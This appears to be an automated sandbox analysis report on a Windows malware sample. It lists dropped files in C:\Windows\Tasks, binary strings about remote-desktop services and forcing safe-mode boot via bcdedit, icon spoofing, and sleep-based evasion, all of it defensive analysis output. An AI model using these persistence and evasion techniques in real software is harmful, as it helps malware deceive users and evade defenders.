Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ndymzn.PPYh2u	Jump to dropped file
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Fgyxfc.Qnwi4I	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\ndymzn.PPYh2u	Jump to dropped file

Source: Fgyxfc.Qnwi4I.0.dr	Binary or memory string: bcdedit.exe
Source: Fgyxfc.Qnwi4I.0.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: Fgyxfc.Qnwi4I.2.dr	Binary or memory string: bcdedit.exe
Source: Fgyxfc.Qnwi4I.2.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: sync_browser.exe.6.dr	Binary or memory string: bcdedit.exe
Source: sync_browser.exe.6.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400081AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	19_2_00007FF7400081AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74000E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	19_2_00007FF74000E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740059A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	19_2_00007FF740059A40
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057BD0 GetPrivateProfileIntA,	19_2_00007FF740057BD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057C90 GetPrivateProfileIntA,	19_2_00007FF740057C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057D50 GetPrivateProfileIntA,	19_2_00007FF740057D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057E10 GetPrivateProfileIntA,	19_2_00007FF740057E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	19_2_00007FF740057650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057EB0 GetPrivateProfileIntA,	19_2_00007FF740057EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	19_2_00007FF740057750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740057F50 GetPrivateProfileIntA,	19_2_00007FF740057F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400577F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	19_2_00007FF7400577F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400578E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	19_2_00007FF7400578E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400081AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	23_2_00007FF7400081AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74000E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	23_2_00007FF74000E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740059A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	23_2_00007FF740059A40
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057BD0 GetPrivateProfileIntA,	23_2_00007FF740057BD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057C90 GetPrivateProfileIntA,	23_2_00007FF740057C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057D50 GetPrivateProfileIntA,	23_2_00007FF740057D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057E10 GetPrivateProfileIntA,	23_2_00007FF740057E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	23_2_00007FF740057650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057EB0 GetPrivateProfileIntA,	23_2_00007FF740057EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	23_2_00007FF740057750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740057F50 GetPrivateProfileIntA,	23_2_00007FF740057F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400577F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	23_2_00007FF7400577F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400578E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	23_2_00007FF7400578E0

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\4735396734841324

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (98).png

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400348B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		19_2_00007FF7400348B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400348B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		23_2_00007FF7400348B0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740005A60 LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,DeleteFileA,

19_2_00007FF740005A60

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Tasks\sync_browser.exe

19_2_00007FF740069BC0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		19_2_00007FF740009D00
Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		23_2_00007FF740009D00

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Windows\Tasks\sync_browser.exe	Window / User API: threadDelayed 1366
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 365
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 362
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 364

Source: C:\Windows\Tasks\sync_browser.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_19-22761

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\Ivn55G.PqhJnU	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\Tasks\sync_browser.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_19-22154

Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 3.6 %
Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 1.2 %

Source: C:\Windows\Tasks\sync_browser.exe TID: 8148	Thread sleep time: -136600s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7980	Thread sleep count: 60 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8184	Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8060	Thread sleep count: 365 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8060	Thread sleep time: -36500s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7992	Thread sleep count: 362 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7992	Thread sleep time: -36200s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7780	Thread sleep count: 364 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7780	Thread sleep time: -36400s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7860	Thread sleep count: 317 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7860	Thread sleep time: -31700s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Tasks\sync_browser.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	19_2_00007FF74002C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	19_2_00007FF7400BA228
